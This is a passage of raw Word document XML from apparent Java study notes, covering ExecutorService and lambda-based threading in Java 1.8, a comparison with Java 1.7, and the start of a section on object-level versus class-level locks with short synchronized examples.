        </w:rPr>
        <w:t>Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expression</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E0D09" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using ExecutorService (Java 1.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6E2E5"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In Java 1.8, the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executor Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> becomes a preferred way to manage threads, as it abstracts thread creation and management behind the scenes. It provides an </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can handle multiple tasks concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B2FC1"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3BA4E" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359F2F35"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public class ExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E2DB2C"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FEF56F"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 Create a thread pool with 2 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A83FB"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ExecutorService executor = Executors.newFixedThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53461A29" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436678E7"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 Submit tasks to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38FFDF"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executor.submit(() -&gt; System.out.println("Task 1 running"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCF291"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executor.submit(() -&gt; System.out.println("Task 2 running"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2755F" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464DAF67"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 Shutdown the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EDFDB"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executor.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE9B71"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCE1172"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158022A0" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advantages of ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD104A" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1108"/>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Simplifies thread management by abstracting thread creation and handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326E19E" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1108"/>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Automatically manages a pool of threads, reducing the overhead of creating and destroying threads for each task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA3241" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1108"/>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Allows handling tasks asynchronously and can manage task scheduling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56C8DF" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564E402" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.7</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C0821" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1109"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread class</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a class that extends Thread and override the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920A6F1" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1109"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement Runnable and pass it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B133EE"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These approaches require explicit thread creation and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D221D21" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C47BDE" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1109"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use functional interfaces (Runnable, Callable, etc.) with concise syntax for defining tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0B74F" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1109"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A more modern, flexible way to manage a pool of threads and submit tasks for execution asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E152C5C" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53BD61" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.7</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, threads were primarily created using the traditional approaches of extending Thread or implementing Runnable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40952B06" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduces more modern and efficient ways to handle threads using </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making the code more concise and manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A05787" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">While the Thread and Runnable approach is still valid in Java 1.8, the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executor framework</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide a more robust and scalable solution for multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED8032" w14:textId="7864B507" w:rsidR="00BD73D4" w:rsidRDefault="00000000" w:rsidP="00BD73D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0AC988B">
          <v:rect id="_x0000_i1820" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B1ACE" w14:textId="1BD928F0" w:rsidR="00912F46" w:rsidRPr="00CE4B95" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_Toc196307745"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Class level lock and Object level lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
    </w:p>
    <w:p w14:paraId="16EE0777" w14:textId="4525BC6F" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object Level Lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A11069"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It locks a single object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF5E1D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used with</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-static synchronized methods or synchronized blocks on this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA73CC" w14:textId="58A643A4" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00822C2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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Behaviour</w:t>
      </w:r>
      <w:r w:rsidR="00912F46" w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only one thread can access the synchronized instance method on the same object at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC93D4A" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00912F46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41142E"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public synchronized void instanceMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFE974"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 xml:space="preserve">    // object-level lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029BB839"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF71536"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Or:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F57C6E"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public void method() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB36133"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    synchronized(this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4C82F"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 xml:space="preserve">        // object-level lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA060B5"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AACAFB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39E71C" w14:textId="77777777" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00000000" w:rsidP="00912F4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A08996C">
